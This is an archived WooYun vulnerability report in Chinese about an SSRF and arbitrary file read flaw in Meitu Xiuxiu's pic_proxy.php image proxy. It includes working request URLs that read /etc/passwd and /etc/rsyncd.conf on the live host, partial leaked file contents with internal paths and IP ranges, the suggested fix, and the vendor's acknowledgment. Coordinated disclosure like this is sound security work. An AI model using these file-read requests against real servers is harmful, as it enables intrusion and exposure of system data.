乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-09: 细节已通知厂商并且等待厂商处理中 2015-04-09: 厂商已经确认,细节仅向厂商公开 2015-04-19: 细节向核心白帽子及相关领域专家公开 2015-04-29: 细节向普通白帽子公开 2015-05-09: 细节向实习白帽子公开 2015-05-24: 细节向公众公开
美图秀秀的某个url在加载图片地址的时候没有判断好url来源,可以ssrf攻击内网或者读取本地的任意文件
http://xiuxiu.web.meitu.com/plat/pic_proxy.php?url=/etc/passwd
*****/sbin/nologin saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin hald*****
所有的web路径都有了:http://xiuxiu.web.meitu.com/plat/pic_proxy.php?url=/etc/rsyncd.conf
*****ww_pomelo_com] path = /www/web/www.pomelo.com/ read only = no hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29 [duoduo_meitu_com] path = /www/web/kankan.web.meitu.com/ read only = no hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29 [corp_meitu_com] path = /www/web/corp.meitu.com/ read only = no hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29 [www_52hxw_com] path = /www/web/www.52hxw.com/ read only = no hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29 [all_meitu_com] path = /www/web/all.meitu.com/ read only = no hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29 [xiuxiu_mobile_meitudata_com] path = /www/web/xiuxiu.mobile.meitudata.com/ read only = no hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29 [wx_upload_meitu_com] path = /www/web/wx.upload.meitu.com/ read only = no hosts allow = 172.17.16.0/24 [expression_meitu_com] path = /www/web/expression.meitu.com/ read only = no hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29 [xiuxiu_web_meitu_com] path = /www/web/xiuxiu.web.meitu.com/ read only = no hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29 [guanjia_meitu_com] path = /www/web/guanjia.meitu.com/ read only = no hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29 [www_posterlabs_cn] path = /www/web/www.posterlabs.cn/ read only = no hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29 [en_meitu_com] path = /www/web/en.meitu.com/ read only = no hosts allow = 172.17.16.0/24 222.76.241.154/2*****
http://xiuxiu.web.meitu.com/plat/pic_proxy.php?url=/etc/passwdhttp://xiuxiu.web.meitu.com/plat/pic_proxy.php?url=/etc/rsyncd.conf
参数严格判断
危害等级:低
漏洞Rank:5
确认时间:2015-04-09 16:44
谢谢白帽子的提醒!
暂无